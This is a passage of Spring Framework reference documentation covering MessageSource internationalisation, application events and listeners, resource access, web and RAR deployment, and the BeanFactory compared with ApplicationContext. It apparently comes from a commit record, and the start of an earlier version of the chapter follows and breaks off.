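For example, the following sketch registers a message programmatically and then resolves\nit (the `greeting` code and the message text are made up for illustration):\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tStaticMessageSource messages = new StaticMessageSource();\n\n\t\/\/ register a message for the English locale under the code 'greeting'\n\tmessages.addMessage(\"greeting\", Locale.ENGLISH, \"Hello!\");\n\n\t\/\/ prints \"Hello!\"\n\tSystem.out.println(messages.getMessage(\"greeting\", null, Locale.ENGLISH));\n----\n\n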
The `ResourceBundleMessageSource` is shown in the following\nexample:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<bean id=\"messageSource\"\n\t\t\t\tclass=\"org.springframework.context.support.ResourceBundleMessageSource\">\n\t\t\t<property name=\"basenames\">\n\t\t\t\t<list>\n\t\t\t\t\t<value>format<\/value>\n\t\t\t\t\t<value>exceptions<\/value>\n\t\t\t\t\t<value>windows<\/value>\n\t\t\t\t<\/list>\n\t\t\t<\/property>\n\t\t<\/bean>\n\t<\/beans>\n----\n\nIn the example, it is assumed that you have three resource bundles defined in your\nclasspath called `format`, `exceptions` and `windows`. Any request to resolve a message\nwill be handled in the JDK standard way of resolving messages through ``ResourceBundle``s.\nFor the purposes of the example, assume the contents of two of the above resource bundle\nfiles are...\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\n# in format.properties\nmessage=Alligators rock!\n----\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\n# in exceptions.properties\nargument.required=The {0} argument is required.\n----\n\nA program to execute the `MessageSource` functionality is shown in the next example.\nRemember that all `ApplicationContext` implementations are also `MessageSource`\nimplementations and so can be cast to the `MessageSource` interface.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tMessageSource resources = new ClassPathXmlApplicationContext(\"beans.xml\");\n\t\tString message = resources.getMessage(\"message\", null, \"Default\", null);\n\t\tSystem.out.println(message);\n\t}\n----\n\nThe resulting output from the above program will be...\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\nAlligators rock!\n----\n\nSo to summarize, the `MessageSource` is defined in a file called `beans.xml`, which\nexists at the root of your classpath. The `messageSource` bean definition refers to a\nnumber of resource bundles through its `basenames` property. 
The three files that are\npassed in the list to the `basenames` property exist as files at the root of your\nclasspath and are called `format.properties`, `exceptions.properties`, and\n`windows.properties` respectively.\n\nThe next example shows arguments passed to the message lookup; these arguments will be\nconverted into Strings and inserted into placeholders in the lookup message.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\n\t\t<!-- this MessageSource is being used in a web application -->\n\t\t<bean id=\"messageSource\" class=\"org.springframework.context.support.ResourceBundleMessageSource\">\n\t\t\t<property name=\"basename\" value=\"exceptions\"\/>\n\t\t<\/bean>\n\n\t\t<!-- let's inject the above MessageSource into this POJO -->\n\t\t<bean id=\"example\" class=\"com.foo.Example\">\n\t\t\t<property name=\"messages\" ref=\"messageSource\"\/>\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class Example {\n\n\t\tprivate MessageSource messages;\n\n\t\tpublic void setMessages(MessageSource messages) {\n\t\t\tthis.messages = messages;\n\t\t}\n\n\t\tpublic void execute() {\n\t\t\tString message = this.messages.getMessage(\"argument.required\",\n\t\t\t\tnew Object[] {\"userDao\"}, \"Required\", null);\n\t\t\tSystem.out.println(message);\n\t\t}\n\n\t}\n----\n\nThe resulting output from the invocation of the `execute()` method will be...\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\nThe userDao argument is required.\n----\n\nWith regard to internationalization (i18n), Spring's various `MessageSource`\nimplementations follow the same locale resolution and fallback rules as the standard JDK\n`ResourceBundle`. In short, and continuing with the example `messageSource` defined\npreviously, if you want to resolve messages against the British (`en-GB`) locale, you\nwould create files called `format_en_GB.properties`, `exceptions_en_GB.properties`, and\n`windows_en_GB.properties` respectively.\n\nTypically, locale resolution is managed by the surrounding environment of the\napplication. In this example, the locale against which (British) messages will be\nresolved is specified manually.\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\n# in exceptions_en_GB.properties\nargument.required=Ebagum lad, the {0} argument is required, I say, required.\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic static void main(final String[] args) {\n\t\tMessageSource resources = new ClassPathXmlApplicationContext(\"beans.xml\");\n\t\tString message = resources.getMessage(\"argument.required\",\n\t\t\tnew Object[] {\"userDao\"}, \"Required\", Locale.UK);\n\t\tSystem.out.println(message);\n\t}\n----\n\nThe resulting output from running the above program will be...\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\nEbagum lad, the userDao argument is required, I say, required.\n----\n\nYou can also use the `MessageSourceAware` interface to acquire a reference to any\n`MessageSource` that has been defined. Any bean that is defined in an\n`ApplicationContext` and that implements the `MessageSourceAware` interface is injected\nwith the application context's `MessageSource` when the bean is created and configured.\n\n
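A minimal sketch of such a bean follows (the class name is made up for illustration):\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MessageSourceAwareBean implements MessageSourceAware {\n\n\t\tprivate MessageSource messageSource;\n\n\t\t\/\/ called by the container after instantiation, before any init callbacks\n\t\t@Override\n\t\tpublic void setMessageSource(MessageSource messageSource) {\n\t\t\tthis.messageSource = messageSource;\n\t\t}\n\t}\n----\n\n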
[NOTE]\n====\n__As an alternative to `ResourceBundleMessageSource`, Spring provides a\n`ReloadableResourceBundleMessageSource` class. This variant supports the same bundle\nfile format but is more flexible than the standard JDK-based\n`ResourceBundleMessageSource` implementation.__ In particular, it allows for reading\nfiles from any Spring resource location (not just from the classpath) and supports hot\nreloading of bundle property files (while efficiently caching them in between). Check\nout the `ReloadableResourceBundleMessageSource` javadocs for details.\n====\n\n\n\n[[context-functionality-events]]\n=== Standard and Custom Events\n\nEvent handling in the `ApplicationContext` is provided through the `ApplicationEvent`\nclass and `ApplicationListener` interface. If a bean that implements the\n`ApplicationListener` interface is deployed into the context, every time an\n`ApplicationEvent` gets published to the `ApplicationContext`, that bean is notified.\nEssentially, this is the standard __Observer__ design pattern.\n\n[TIP]\n====\nAs of Spring 4.2, the event infrastructure has been significantly improved and offers\nan <<context-functionality-events-annotation,annotation-based model>> as well as the\nability to publish any arbitrary event, that is, an object that does not necessarily\nextend from `ApplicationEvent`. When such an object is published, it is wrapped in an\nevent for you.\n====\n\nSpring provides the following standard events:\n\n[[beans-ctx-events-tbl]]\n.Built-in Events\n|===\n| Event| Explanation\n\n| `ContextRefreshedEvent`\n| Published when the `ApplicationContext` is initialized or refreshed, for example,\n using the `refresh()` method on the `ConfigurableApplicationContext` interface.\n \"Initialized\" here means that all beans are loaded, post-processor beans are detected\n and activated, singletons are pre-instantiated, and the `ApplicationContext` object is\n ready for use. As long as the context has not been closed, a refresh can be triggered\n multiple times, provided that the chosen `ApplicationContext` actually supports such\n \"hot\" refreshes. For example, `XmlWebApplicationContext` supports hot refreshes, but\n `GenericApplicationContext` does not.\n\n| `ContextStartedEvent`\n| Published when the `ApplicationContext` is started, using the `start()` method on the\n `ConfigurableApplicationContext` interface. \"Started\" here means that all `Lifecycle`\n beans receive an explicit start signal. Typically, this signal is used to restart beans\n after an explicit stop, but it may also be used to start components that have not been\n configured for autostart, for example, components that have not already started on\n initialization.\n\n| `ContextStoppedEvent`\n| Published when the `ApplicationContext` is stopped, using the `stop()` method on the\n `ConfigurableApplicationContext` interface. \"Stopped\" here means that all `Lifecycle`\n beans receive an explicit stop signal. A stopped context may be restarted through a\n `start()` call.\n\n| `ContextClosedEvent`\n| Published when the `ApplicationContext` is closed, using the `close()` method on the\n `ConfigurableApplicationContext` interface. \"Closed\" here means that all singleton\n beans are destroyed. A closed context reaches its end of life; it cannot be refreshed\n or restarted.\n\n| `RequestHandledEvent`\n| A web-specific event telling all beans that an HTTP request has been serviced. This\n event is published __after__ the request is complete. This event is only applicable to\n web applications using Spring's `DispatcherServlet`.\n|===\n\nYou can also create and publish your own custom events. 
This example demonstrates a\nsimple class that extends Spring's `ApplicationEvent` base class:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class BlackListEvent extends ApplicationEvent {\n\n\t\tprivate final String address;\n\t\tprivate final String test;\n\n\t\tpublic BlackListEvent(Object source, String address, String test) {\n\t\t\tsuper(source);\n\t\t\tthis.address = address;\n\t\t\tthis.test = test;\n\t\t}\n\n\t\t\/\/ accessor and other methods...\n\n\t}\n----\n\nTo publish a custom `ApplicationEvent`, call the `publishEvent()` method on an\n`ApplicationEventPublisher`. Typically this is done by creating a class that implements\n`ApplicationEventPublisherAware` and registering it as a Spring bean. The following\nexample demonstrates such a class:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class EmailService implements ApplicationEventPublisherAware {\n\n\t\tprivate List<String> blackList;\n\t\tprivate ApplicationEventPublisher publisher;\n\n\t\tpublic void setBlackList(List<String> blackList) {\n\t\t\tthis.blackList = blackList;\n\t\t}\n\n\t\tpublic void setApplicationEventPublisher(ApplicationEventPublisher publisher) {\n\t\t\tthis.publisher = publisher;\n\t\t}\n\n\t\tpublic void sendEmail(String address, String text) {\n\t\t\tif (blackList.contains(address)) {\n\t\t\t\tBlackListEvent event = new BlackListEvent(this, address, text);\n\t\t\t\tpublisher.publishEvent(event);\n\t\t\t\treturn;\n\t\t\t}\n\t\t\t\/\/ send email...\n\t\t}\n\n\t}\n----\n\nAt configuration time, the Spring container will detect that `EmailService` implements\n`ApplicationEventPublisherAware` and will automatically call\n`setApplicationEventPublisher()`. In reality, the parameter passed in will be the Spring\ncontainer itself; you're simply interacting with the application context via its\n`ApplicationEventPublisher` interface.\n\nTo receive the custom `ApplicationEvent`, create a class that implements\n`ApplicationListener` and register it as a Spring bean. The following example\ndemonstrates such a class:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class BlackListNotifier implements ApplicationListener<BlackListEvent> {\n\n\t\tprivate String notificationAddress;\n\n\t\tpublic void setNotificationAddress(String notificationAddress) {\n\t\t\tthis.notificationAddress = notificationAddress;\n\t\t}\n\n\t\tpublic void onApplicationEvent(BlackListEvent event) {\n\t\t\t\/\/ notify appropriate parties via notificationAddress...\n\t\t}\n\n\t}\n----\n\nNotice that `ApplicationListener` is generically parameterized with the type of your\ncustom event, `BlackListEvent`. This means that the `onApplicationEvent()` method can\nremain type-safe, avoiding any need for downcasting. You may register as many event\nlisteners as you wish, but note that by default event listeners receive events\nsynchronously. This means the `publishEvent()` method blocks until all listeners have\nfinished processing the event. One advantage of this synchronous and single-threaded\napproach is that when a listener receives an event, it operates inside the transaction\ncontext of the publisher if a transaction context is available. 
If another strategy for\nevent publication becomes necessary, refer to the JavaDoc for Spring's\n`ApplicationEventMulticaster` interface.\n\nThe following example shows the bean definitions used to register and configure each of\nthe classes above:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"emailService\" class=\"example.EmailService\">\n\t\t<property name=\"blackList\">\n\t\t\t<list>\n\t\t\t\t<value>known.spammer@example.org<\/value>\n\t\t\t\t<value>known.hacker@example.org<\/value>\n\t\t\t\t<value>john.doe@example.org<\/value>\n\t\t\t<\/list>\n\t\t<\/property>\n\t<\/bean>\n\n\t<bean id=\"blackListNotifier\" class=\"example.BlackListNotifier\">\n\t\t<property name=\"notificationAddress\" value=\"blacklist@example.org\"\/>\n\t<\/bean>\n----\n\nPutting it all together, when the `sendEmail()` method of the `emailService` bean is\ncalled, if there are any emails that should be blacklisted, a custom event of type\n`BlackListEvent` is published. The `blackListNotifier` bean is registered as an\n`ApplicationListener` and thus receives the `BlackListEvent`, at which point it can\nnotify appropriate parties.\n\n[NOTE]\n====\nSpring's eventing mechanism is designed for simple communication between Spring beans\nwithin the same application context. However, for more sophisticated enterprise\nintegration needs, the separately-maintained\nhttp:\/\/projects.spring.io\/spring-integration\/[Spring Integration] project provides\ncomplete support for building lightweight,\nhttp:\/\/www.enterpriseintegrationpatterns.com[pattern-oriented], event-driven\narchitectures that build upon the well-known Spring programming model.\n====\n\n[[context-functionality-events-annotation]]\n==== Annotation-based Event Listeners\n\nAs of Spring 4.2, an event listener can be registered on any public method of a managed\nbean via the `@EventListener` annotation. The `BlackListNotifier` can be rewritten as\nfollows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class BlackListNotifier {\n\n\t\tprivate String notificationAddress;\n\n\t\tpublic void setNotificationAddress(String notificationAddress) {\n\t\t\tthis.notificationAddress = notificationAddress;\n\t\t}\n\n\t\t@EventListener\n\t\tpublic void processBlackListEvent(BlackListEvent event) {\n\t\t\t\/\/ notify appropriate parties via notificationAddress...\n\t\t}\n\n\t}\n----\n\nAs you can see above, the method signature actually _infers_ which event type it listens to. 
This\nalso works for nested generics as long as the actual event resolves the generic\nparameter you would filter on.\n\nIf your method should listen to several events or if you want to define it with no\nparameter at all, the event type(s) can also be specified on the annotation itself:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@EventListener({ContextStartedEvent.class, ContextRefreshedEvent.class})\n\tpublic void handleContextStart() {\n\n\t}\n----\n\n\nIt is also possible to add additional runtime filtering via the `condition` attribute of\nthe annotation, which defines a <<expressions,`SpEL` expression>> that must match for the\nmethod to actually be invoked for a particular event.\n\nFor instance, our notifier can be rewritten to be invoked only if the `test` attribute of\nthe event is equal to `foo`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@EventListener(condition = \"#event.test == 'foo'\")\n\tpublic void processBlackListEvent(BlackListEvent event) {\n\t\t\/\/ notify appropriate parties via notificationAddress...\n\t}\n----\n\nEach `SpEL` expression is evaluated against a dedicated context. The next table lists the\nitems made available to the context so one can use them for conditional event processing:\n\n[[context-functionality-events-annotation-tbl]]\n.Event SpEL available metadata\n|===\n| Name| Location| Description| Example\n\n| event\n| root object\n| The actual `ApplicationEvent`\n| `#root.event`\n\n| args\n| root object\n| The arguments (as array) used for invoking the target\n| `#root.args[0]`\n\n| __argument name__\n| evaluation context\n| Name of any of the method arguments. If for some reason the names are not available\n (e.g. no debug information), the argument names are also available under the `#a<#arg>`\n notation, where __#arg__ stands for the argument index (starting from 0).\n| `#iban` or `#a0` (one can also use `#p0` or `#p<#arg>` notation as an alias).\n|===\n\nNote that `#root.event` allows you to access the underlying event, even if your method\nsignature actually refers to an arbitrary object that was published.\n\nIf you need to publish an event as the result of processing another, just change the\nmethod signature to return the event that should be published, something like:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@EventListener\n\tpublic ListUpdateEvent handleBlackListEvent(BlackListEvent event) {\n\t\t\/\/ notify appropriate parties via notificationAddress and\n\t\t\/\/ then publish a ListUpdateEvent...\n\t}\n----\n\nNOTE: This feature is not supported for <<context-functionality-events-async,asynchronous\nlisteners>>.\n\nThis new method will publish a new `ListUpdateEvent` for every `BlackListEvent` handled\nby the method above. If you need to publish several events, just return a `Collection` of\nevents instead.\n\n[[context-functionality-events-async]]\n==== Asynchronous Listeners\n\nIf you want a particular listener to process events asynchronously, simply reuse the\n<<scheduling-annotation-support-async,regular `@Async` support>>:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@EventListener\n\t@Async\n\tpublic void processBlackListEvent(BlackListEvent event) {\n\t\t\/\/ BlackListEvent is processed in a separate thread\n\t}\n----\n\nBe aware of the following limitations when using asynchronous events:\n\n. If the event listener throws an `Exception`, it will not be propagated to the caller;\n check `AsyncUncaughtExceptionHandler` for more details.\n. Such an event listener cannot send replies. If you need to send another event as the\n result of the processing, inject `ApplicationEventPublisher` to send the event\n manually, as sketched below.\n\n
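For example, an asynchronous variant of our notifier could publish the follow-up event\nmanually (a sketch only; it assumes a `ListUpdateEvent` class like the one shown earlier):\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class AsyncBlackListNotifier implements ApplicationEventPublisherAware {\n\n\t\tprivate ApplicationEventPublisher publisher;\n\n\t\tpublic void setApplicationEventPublisher(ApplicationEventPublisher publisher) {\n\t\t\tthis.publisher = publisher;\n\t\t}\n\n\t\t@EventListener\n\t\t@Async\n\t\tpublic void processBlackListEvent(BlackListEvent event) {\n\t\t\t\/\/ an async listener cannot reply by returning an event;\n\t\t\t\/\/ publish the follow-up event manually instead\n\t\t\tpublisher.publishEvent(new ListUpdateEvent(this));\n\t\t}\n\t}\n----\n\n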
[[context-functionality-events-order]]\n==== Ordering Listeners\n\nIf you need the listener to be invoked before another one, just add the `@Order`\nannotation to the method declaration:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@EventListener\n\t@Order(42)\n\tpublic void processBlackListEvent(BlackListEvent event) {\n\t\t\/\/ notify appropriate parties via notificationAddress...\n\t}\n----\n\n[[context-functionality-events-generics]]\n==== Generic Events\n\nYou may also use generics to further define the structure of your event. Consider an\n`EntityCreatedEvent<T>` where `T` is the type of the actual entity that got created. You\ncan create the following listener definition to only receive `EntityCreatedEvent` for a\n`Person`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@EventListener\n\tpublic void onPersonCreated(EntityCreatedEvent<Person> event) {\n\t\t...\n\t}\n----\n\n\nDue to type erasure, this will only work if the event that is fired resolves the generic\nparameter(s) on which the event listener filters (that is, something like\n`class PersonCreatedEvent extends EntityCreatedEvent<Person> { ... }`).\n\nIn certain circumstances, this may become quite tedious if all events follow the same\nstructure (as should be the case for the event above). In such a case, you can\nimplement `ResolvableTypeProvider` to _guide_ the framework beyond what the runtime\nenvironment provides:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class EntityCreatedEvent<T>\n\t\t\textends ApplicationEvent implements ResolvableTypeProvider {\n\n\t\tpublic EntityCreatedEvent(T entity) {\n\t\t\tsuper(entity);\n\t\t}\n\n\t\t@Override\n\t\tpublic ResolvableType getResolvableType() {\n\t\t\treturn ResolvableType.forClassWithGenerics(getClass(),\n\t\t\t\t\tResolvableType.forInstance(getSource()));\n\t\t}\n\t}\n----\n\n[TIP]\n====\nThis works not only for `ApplicationEvent` but for any arbitrary object that you'd send\nas an event.\n====\n\n\n\n[[context-functionality-resources]]\n=== Convenient access to low-level resources\n\nFor optimal usage and understanding of application contexts, users should generally\nfamiliarize themselves with Spring's `Resource` abstraction, as described in the chapter\n<<resources>>.\n\nAn application context is a `ResourceLoader`, which can be used to load ``Resource``s. A\n`Resource` is essentially a more feature-rich version of the JDK class `java.net.URL`;\nin fact, the implementations of `Resource` wrap an instance of `java.net.URL` where\nappropriate. A `Resource` can obtain low-level resources from almost any location in a\ntransparent fashion, including from the classpath, a filesystem location, anywhere\ndescribable with a standard URL, and some other variations. If the resource location\nstring is a simple path without any special prefixes, where those resources come from is\nspecific and appropriate to the actual application context type.\n\nYou can configure a bean deployed into the application context to implement the special\ncallback interface, `ResourceLoaderAware`, to be automatically called back at\ninitialization time with the application context itself passed in as the\n`ResourceLoader`. You can also expose properties of type `Resource`, to be used to\naccess static resources; they will be injected like any other properties. You can\nspecify those `Resource` properties as simple String paths, and rely on a special\nJavaBean `PropertyEditor` that is automatically registered by the context, to convert\nthose text strings to actual `Resource` objects when the bean is deployed.\n\n
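For example, a bean might expose a `template` property of type `Resource` (the class and\nproperty names here are made up for illustration):\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class ReportGenerator {\n\n\t\tprivate Resource template;\n\n\t\t\/\/ a bean definition can set this from a simple String path such as\n\t\t\/\/ \"classpath:report.txt\"; the container converts it to a Resource\n\t\tpublic void setTemplate(Resource template) {\n\t\t\tthis.template = template;\n\t\t}\n\t}\n----\n\n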
The location path or paths supplied to an `ApplicationContext` constructor are actually\nresource strings, and in simple form are treated appropriately to the specific context\nimplementation. `ClassPathXmlApplicationContext` treats a simple location path as a\nclasspath location. You can also use location paths (resource strings) with special\nprefixes to force loading of definitions from the classpath or a URL, regardless of the\nactual context type.\n\n\n\n[[context-create]]\n=== Convenient ApplicationContext instantiation for web applications\n\nYou can create `ApplicationContext` instances declaratively by using, for example, a\n`ContextLoader`. Of course, you can also create `ApplicationContext` instances\nprogrammatically by using one of the `ApplicationContext` implementations.\n\nYou can register an `ApplicationContext` using the `ContextLoaderListener` as follows:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<context-param>\n\t\t<param-name>contextConfigLocation<\/param-name>\n\t\t<param-value>\/WEB-INF\/daoContext.xml \/WEB-INF\/applicationContext.xml<\/param-value>\n\t<\/context-param>\n\n\t<listener>\n\t\t<listener-class>org.springframework.web.context.ContextLoaderListener<\/listener-class>\n\t<\/listener>\n----\n\nThe listener inspects the `contextConfigLocation` parameter. If the parameter does not\nexist, the listener uses `\/WEB-INF\/applicationContext.xml` as a default. When the\nparameter __does__ exist, the listener separates the String by using predefined\ndelimiters (comma, semicolon and whitespace) and uses the values as locations where\napplication contexts will be searched. Ant-style path patterns are supported as well.\nExamples are `\/WEB-INF\/{asterisk}Context.xml` for all files with names ending with \"Context.xml\",\nresiding in the \"WEB-INF\" directory, and `\/WEB-INF\/**\/*Context.xml`, for all such files\nin any subdirectory of \"WEB-INF\".\n\n\n\n[[context-deploy-rar]]\n=== Deploying a Spring ApplicationContext as a Java EE RAR file\n\nIt is possible to deploy a Spring ApplicationContext as a RAR file, encapsulating the\ncontext and all of its required bean classes and library JARs in a Java EE RAR deployment\nunit. This is the equivalent of bootstrapping a standalone ApplicationContext, just hosted\nin a Java EE environment and able to access the Java EE server's facilities. RAR deployment\nis a more natural alternative to the scenario of deploying a headless WAR file, in effect\na WAR file without any HTTP entry points, used only for bootstrapping a Spring\nApplicationContext in a Java EE environment.\n\nRAR deployment is ideal for application contexts that do not need HTTP entry points but\nrather consist only of message endpoints and scheduled jobs. Beans in such a context can\nuse application server resources such as the JTA transaction manager and JNDI-bound JDBC\nDataSources and JMS ConnectionFactory instances, and may also register with the\nplatform's JMX server - all through Spring's standard transaction management and JNDI\nand JMX support facilities. 
Application components can also interact with the\napplication server's JCA WorkManager through Spring's `TaskExecutor` abstraction.\n\nCheck out the JavaDoc of the\n{api-spring-framework}\/jca\/context\/SpringContextResourceAdapter.html[`SpringContextResourceAdapter`]\nclass for the configuration details involved in RAR deployment.\n\n__For a simple deployment of a Spring ApplicationContext as a Java EE RAR file:__ package\nall application classes into a RAR file, which is a standard JAR file with a different\nfile extension. Add all required library JARs into the root of the RAR archive. Add a\n\"META-INF\/ra.xml\" deployment descriptor (as shown in the `SpringContextResourceAdapter`\nJavaDoc) and the corresponding Spring XML bean definition file(s) (typically\n\"META-INF\/applicationContext.xml\"), and drop the resulting RAR file into your\napplication server's deployment directory.\n\n[NOTE]\n====\nSuch RAR deployment units are usually self-contained; they do not expose components to\nthe outside world, not even to other modules of the same application. Interaction with a\nRAR-based ApplicationContext usually occurs through JMS destinations that it shares with\nother modules. A RAR-based ApplicationContext may also, for example, schedule some jobs,\nreacting to new files in the file system (or the like). If it needs to allow synchronous\naccess from the outside, it could for example export RMI endpoints, which of course may\nbe used by other application modules on the same machine.\n====\n\n\n\n\n[[beans-beanfactory]]\n== The BeanFactory\nThe `BeanFactory` provides the underlying basis for Spring's IoC functionality, but it is\nonly used directly in integration with other third-party frameworks and is now largely\nhistorical in nature for most users of Spring. The `BeanFactory` and related interfaces,\nsuch as `BeanFactoryAware`, `InitializingBean`, `DisposableBean`, are still present in\nSpring for the purposes of backward compatibility with the large number of third-party\nframeworks that integrate with Spring. Often, such third-party components cannot use\nmore modern equivalents such as `@PostConstruct` or `@PreDestroy`, in order to remain\ncompatible with JDK 1.4 or to avoid a dependency on JSR-250.\n\nThis section provides additional background into the differences between the\n`BeanFactory` and `ApplicationContext` and how one might access the IoC container\ndirectly through a classic singleton lookup.\n\n\n\n[[context-introduction-ctx-vs-beanfactory]]\n=== BeanFactory or ApplicationContext?\n\nUse an `ApplicationContext` unless you have a good reason for not doing so.\n\nBecause the `ApplicationContext` includes all functionality of the `BeanFactory`, it is\ngenerally recommended over the `BeanFactory`, except for a few situations such as in\nembedded applications running on resource-constrained devices where memory consumption\nmight be critical and a few extra kilobytes might make a difference. However, for\nmost typical enterprise applications and systems, the `ApplicationContext` is what you\nwill want to use. Spring makes __heavy__ use of the <<beans-factory-extension-bpp,\n`BeanPostProcessor` extension point>> (to effect proxying and so on). If you use only a\nplain `BeanFactory`, a fair amount of support such as transactions and AOP will not take\neffect, at least not without some extra steps on your part. 
This situation could be\nconfusing because nothing is actually wrong with the configuration.\n\nThe following table lists features provided by the `BeanFactory` and\n`ApplicationContext` interfaces and implementations.\n\n[[context-introduction-ctx-vs-beanfactory-feature-matrix]]\n.Feature Matrix\n|===\n| Feature| `BeanFactory`| `ApplicationContext`\n\n| Bean instantiation\/wiring\n| Yes\n| Yes\n\n| Automatic `BeanPostProcessor` registration\n| No\n| Yes\n\n| Automatic `BeanFactoryPostProcessor` registration\n| No\n| Yes\n\n| Convenient `MessageSource` access (for i18n)\n| No\n| Yes\n\n| `ApplicationEvent` publication\n| No\n| Yes\n|===\n\nTo explicitly register a bean post-processor with a `BeanFactory` implementation,\nyou need to write code like this:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tDefaultListableBeanFactory factory = new DefaultListableBeanFactory();\n\t\/\/ populate the factory with bean definitions\n\n\t\/\/ now register any needed BeanPostProcessor instances\n\tMyBeanPostProcessor postProcessor = new MyBeanPostProcessor();\n\tfactory.addBeanPostProcessor(postProcessor);\n\n\t\/\/ now start using the factory\n----\n\nTo explicitly register a `BeanFactoryPostProcessor` when using a `BeanFactory`\nimplementation, you must write code like this:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tDefaultListableBeanFactory factory = new DefaultListableBeanFactory();\n\tXmlBeanDefinitionReader reader = new XmlBeanDefinitionReader(factory);\n\treader.loadBeanDefinitions(new FileSystemResource(\"beans.xml\"));\n\n\t\/\/ bring in some property values from a Properties file\n\tPropertyPlaceholderConfigurer cfg = new PropertyPlaceholderConfigurer();\n\tcfg.setLocation(new FileSystemResource(\"jdbc.properties\"));\n\n\t\/\/ now actually do the replacement\n\tcfg.postProcessBeanFactory(factory);\n----\n\nIn both cases, the explicit registration step is inconvenient, which is one reason why\nthe various `ApplicationContext` implementations are preferred over plain `BeanFactory`\nimplementations in the vast majority of Spring-backed applications, especially when\nusing ``BeanFactoryPostProcessor``s and ``BeanPostProcessor``s. These mechanisms implement\nimportant functionality such as property placeholder replacement and AOP.\n\n\n\n[[beans-servicelocator]]\n=== Glue code and the evil singleton\n\nIt is best to write most application code in a dependency-injection (DI) style, where\nthat code is served out of a Spring IoC container, has its own dependencies supplied by\nthe container when it is created, and is completely unaware of the container. However,\nfor the small glue layers of code that are sometimes needed to tie other code together,\nyou sometimes need singleton (or quasi-singleton) style access to a Spring IoC\ncontainer. For example, third-party code may try to construct new objects directly\n(`Class.forName()` style), without the ability to get these objects out of a Spring IoC\ncontainer. If the object constructed by the third-party code is a small stub or proxy,\nwhich then uses singleton-style access to a Spring IoC container to get a real object\nto delegate to, then inversion of control has still been achieved for the majority of\nthe code (the object coming out of the container). Thus most code is still unaware of\nthe container or how it is accessed, and remains decoupled from other code, with all\nensuing benefits. 
EJBs may also use this stub\/proxy approach to delegate to a plain Java\nimplementation object, retrieved from a Spring IoC container. While the Spring IoC\ncontainer itself ideally does not have to be a singleton, it may be unrealistic in terms\nof memory usage or initialization times (when using beans in the Spring IoC container\nsuch as a Hibernate `SessionFactory`) for each bean to use its own, non-singleton Spring\nIoC container.\n\nLooking up the application context in a service locator style is sometimes the only\noption for accessing shared Spring-managed components, such as in an EJB 2.1\nenvironment, or when you want to share a single ApplicationContext as a parent to\nWebApplicationContexts across WAR files. In this case, you should look into using the\n{api-spring-framework}\/context\/access\/ContextSingletonBeanFactoryLocator.html[`ContextSingletonBeanFactoryLocator`]\nutility class, which is described in this\nhttps:\/\/spring.io\/blog\/2007\/06\/11\/using-a-shared-parent-application-context-in-a-multi-war-spring-application\/[Spring\nteam blog entry].\n","old_contents":"[[beans]]\n= The IoC container\n\n\n[[beans-introduction]]\n== Introduction to the Spring IoC container and beans\nThis chapter covers the Spring Framework implementation of the Inversion of Control\n(IoC) footnote:[See pass:specialcharacters,macros[<<background-ioc>>] ] principle. IoC\nis also known as __dependency injection__ (DI). It is a process whereby objects define\ntheir dependencies, that is, the other objects they work with, only through constructor\narguments, arguments to a factory method, or properties that are set on the object\ninstance after it is constructed or returned from a factory method. The container then\n__injects__ those dependencies when it creates the bean. This process is fundamentally\nthe inverse, hence the name __Inversion of Control__ (IoC), of the bean itself\ncontrolling the instantiation or location of its dependencies by using direct\nconstruction of classes, or a mechanism such as the __Service Locator__ pattern.\n\nThe `org.springframework.beans` and `org.springframework.context` packages are the basis\nfor Spring Framework's IoC container. The\n{api-spring-framework}\/beans\/factory\/BeanFactory.html[`BeanFactory`]\ninterface provides an advanced configuration mechanism capable of managing any type of\nobject.\n{api-spring-framework}\/context\/ApplicationContext.html[`ApplicationContext`]\nis a sub-interface of `BeanFactory`. It adds easier integration with Spring's AOP\nfeatures, message resource handling (for use in internationalization), event\npublication, and application-layer-specific contexts such as the `WebApplicationContext`\nfor use in web applications.\n\nIn short, the `BeanFactory` provides the configuration framework and basic\nfunctionality, and the `ApplicationContext` adds more enterprise-specific functionality.\nThe `ApplicationContext` is a complete superset of the `BeanFactory`, and is used\nexclusively in this chapter in descriptions of Spring's IoC container. For more\ninformation on using the `BeanFactory` instead of the `ApplicationContext`, refer to\n<<beans-beanfactory>>.\n\nIn Spring, the objects that form the 